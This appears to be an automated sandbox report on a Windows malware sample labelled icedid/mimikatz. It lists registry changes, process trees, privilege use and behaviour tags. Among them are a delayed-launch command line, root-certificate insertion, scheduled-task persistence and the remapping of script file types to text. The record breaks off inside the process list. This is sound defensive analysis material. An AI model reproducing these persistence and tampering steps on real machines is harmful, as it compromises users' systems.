Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dqljao.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2384 cmd.exe 1896 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral1/files/0x0008000000016c03-5.dat nsis_installer_2 behavioral1/files/0x0009000000016dd5-15.dat nsis_installer_1 behavioral1/files/0x0009000000016dd5-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bieqttlep.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates iyapfhp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates iyapfhp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-10-eb-28-06-76\WpadDecision = "0" iyapfhp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA iyapfhp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs iyapfhp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates iyapfhp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-10-eb-28-06-76\WpadDecisionTime = 603ac5a8f7f5da01 iyapfhp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix iyapfhp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bieqttlep.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My iyapfhp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust iyapfhp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" iyapfhp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs iyapfhp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates iyapfhp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 iyapfhp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{848405D3-BB2A-410A-9969-EE30BCB0021E}\WpadDecisionTime = 605f3c67f7f5da01 iyapfhp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" bieqttlep.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs iyapfhp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bieqttlep.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bieqttlep.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs iyapfhp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" iyapfhp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{848405D3-BB2A-410A-9969-EE30BCB0021E}\WpadNetworkName = "Network 3" iyapfhp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs iyapfhp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bieqttlep.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs iyapfhp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs iyapfhp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople iyapfhp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 iyapfhp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00c8000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 iyapfhp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad iyapfhp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" bieqttlep.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA iyapfhp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot iyapfhp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople iyapfhp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs iyapfhp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bieqttlep.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bieqttlep.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates iyapfhp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 iyapfhp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" iyapfhp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs iyapfhp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed iyapfhp.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" iyapfhp.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 iyapfhp.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 iyapfhp.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1896 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2384 schtasks.exe 1896 schtasks.exe 2536 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 2932 iyapfhp.exe 3764 iyapfhp.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe -
Suspicious behavior: LoadsDriver 31 IoCs
pid Process 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2084 2024-08-24_9e4c48cee883bf2cd0a41aab45be3fdf_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2084 2024-08-24_9e4c48cee883bf2cd0a41aab45be3fdf_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2060 iyapfhp.exe Token: SeDebugPrivilege 2776 iyapfhp.exe Token: SeDebugPrivilege 1728 vfshost.exe Token: SeAuditPrivilege 2636 svchost.exe Token: SeDebugPrivilege 3044 bieqttlep.exe Token: SeShutdownPrivilege 3044 bieqttlep.exe Token: SeLockMemoryPrivilege 2464 yetdzn.exe Token: SeLockMemoryPrivilege 2464 yetdzn.exe Token: SeDebugPrivilege 1900 bieqttlep.exe Token: SeShutdownPrivilege 1900 bieqttlep.exe Token: SeDebugPrivilege 2700 bieqttlep.exe Token: SeShutdownPrivilege 2700 bieqttlep.exe Token: SeDebugPrivilege 1876 bieqttlep.exe Token: SeShutdownPrivilege 1876 bieqttlep.exe Token: SeDebugPrivilege 2056 bieqttlep.exe Token: SeShutdownPrivilege 2056 bieqttlep.exe Token: SeDebugPrivilege 2220 bieqttlep.exe Token: SeShutdownPrivilege 2220 bieqttlep.exe Token: SeDebugPrivilege 2348 bieqttlep.exe Token: SeShutdownPrivilege 2348 bieqttlep.exe Token: SeDebugPrivilege 604 bieqttlep.exe Token: SeShutdownPrivilege 604 bieqttlep.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2084 2024-08-24_9e4c48cee883bf2cd0a41aab45be3fdf_hacktools_icedid_mimikatz.exe 2084 2024-08-24_9e4c48cee883bf2cd0a41aab45be3fdf_hacktools_icedid_mimikatz.exe 2060 iyapfhp.exe 2060 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 1544 xohudmc.exe 2868 dqljao.exe 2932 iyapfhp.exe 2932 iyapfhp.exe 3764 iyapfhp.exe 3764 iyapfhp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2084 wrote to memory of 2384 2084 2024-08-24_9e4c48cee883bf2cd0a41aab45be3fdf_hacktools_icedid_mimikatz.exe 30 PID 2084 wrote to memory of 2384 2084 2024-08-24_9e4c48cee883bf2cd0a41aab45be3fdf_hacktools_icedid_mimikatz.exe 30 PID 2084 wrote to memory of 2384 2084 2024-08-24_9e4c48cee883bf2cd0a41aab45be3fdf_hacktools_icedid_mimikatz.exe 30 PID 2084 wrote to memory of 2384 2084 2024-08-24_9e4c48cee883bf2cd0a41aab45be3fdf_hacktools_icedid_mimikatz.exe 30 PID 2384 wrote to memory of 1896 2384 cmd.exe 32 PID 2384 wrote to memory of 1896 2384 cmd.exe 32 PID 2384 wrote to memory of 1896 2384 cmd.exe 32 PID 2384 wrote to memory of 1896 2384 cmd.exe 32 PID 2384 wrote to memory of 2060 2384 cmd.exe 33 PID 2384 wrote to memory of 2060 2384 cmd.exe 33 PID 2384 wrote to memory of 2060 2384 cmd.exe 33 PID 2384 wrote to memory of 2060 2384 cmd.exe 33 PID 2776 wrote to memory of 2736 2776 iyapfhp.exe 35 PID 2776 wrote to memory of 2736 2776 iyapfhp.exe 35 PID 2776 wrote to memory of 2736 2776 iyapfhp.exe 35 PID 2776 wrote to memory of 2736 2776 iyapfhp.exe 35 PID 2736 wrote to memory of 2792 2736 cmd.exe 37 PID 2736 wrote to memory of 2792 2736 cmd.exe 37 PID 2736 wrote to memory of 2792 2736 cmd.exe 37 PID 2736 wrote to memory of 2792 2736 cmd.exe 37 PID 2736 wrote to memory of 2748 2736 cmd.exe 38 PID 2736 wrote to memory of 2748 2736 cmd.exe 38 PID 2736 wrote to memory of 2748 2736 cmd.exe 38 PID 2736 wrote to memory of 2748 2736 cmd.exe 38 PID 2736 wrote to memory of 2720 2736 cmd.exe 39 PID 2736 wrote to memory of 2720 2736 cmd.exe 39 PID 2736 wrote to memory of 2720 2736 cmd.exe 39 PID 2736 wrote to memory of 2720 2736 cmd.exe 39 PID 2736 wrote to memory of 2724 2736 cmd.exe 40 PID 2736 wrote to memory of 2724 2736 cmd.exe 40 PID 2736 wrote to memory of 2724 2736 cmd.exe 40 PID 2736 wrote to memory of 2724 2736 cmd.exe 40 PID 2736 wrote to memory of 1944 2736 cmd.exe 41 PID 2736 wrote to memory of 1944 2736 cmd.exe 41 PID 2736 wrote to memory of 1944 2736 cmd.exe 41 PID 2736 wrote to memory of 1944 2736 cmd.exe 41 PID 2736 wrote to memory of 3004 2736 cmd.exe 42 PID 2736 wrote to memory of 3004 2736 cmd.exe 42 PID 2736 wrote to memory of 3004 2736 cmd.exe 42 PID 2736 wrote to memory of 3004 2736 cmd.exe 42 PID 2776 wrote to memory of 2620 2776 iyapfhp.exe 44 PID 2776 wrote to memory of 2620 2776 iyapfhp.exe 44 PID 2776 wrote to memory of 2620 2776 iyapfhp.exe 44 PID 2776 wrote to memory of 2620 2776 iyapfhp.exe 44 PID 2776 wrote to memory of 2648 2776 iyapfhp.exe 46 PID 2776 wrote to memory of 2648 2776 iyapfhp.exe 46 PID 2776 wrote to memory of 2648 2776 iyapfhp.exe 46 PID 2776 wrote to memory of 2648 2776 iyapfhp.exe 46 PID 2776 wrote to memory of 1300 2776 iyapfhp.exe 48 PID 2776 wrote to memory of 1300 2776 iyapfhp.exe 48 PID 2776 wrote to memory of 1300 2776 iyapfhp.exe 48 PID 2776 wrote to memory of 1300 2776 iyapfhp.exe 48 PID 2776 wrote to memory of 588 2776 iyapfhp.exe 50 PID 2776 wrote to memory of 588 2776 iyapfhp.exe 50 PID 2776 wrote to memory of 588 2776 iyapfhp.exe 50 PID 2776 wrote to memory of 588 2776 iyapfhp.exe 50 PID 588 wrote to memory of 1484 588 cmd.exe 52 PID 588 wrote to memory of 1484 588 cmd.exe 52 PID 588 wrote to memory of 1484 588 cmd.exe 52 PID 588 wrote to memory of 1484 588 cmd.exe 52 PID 588 wrote to memory of 1484 588 cmd.exe 52 PID 588 wrote to memory of 1484 588 cmd.exe 52 PID 588 wrote to memory of 1484 588 cmd.exe 52 PID 1484 wrote to memory of 1656 1484 wpcap.exe 53
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:676
-
C:\Windows\TEMP\ieszltnbu\yetdzn.exe"C:\Windows\TEMP\ieszltnbu\yetdzn.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
C:\Users\Admin\AppData\Local\Temp\2024-08-24_9e4c48cee883bf2cd0a41aab45be3fdf_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-24_9e4c48cee883bf2cd0a41aab45be3fdf_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\kiprrupu\iyapfhp.exe2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1896
-
-
C:\Windows\kiprrupu\iyapfhp.exeC:\Windows\kiprrupu\iyapfhp.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2060
-
-
-
C:\Windows\kiprrupu\iyapfhp.exeC:\Windows\kiprrupu\iyapfhp.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2776 -
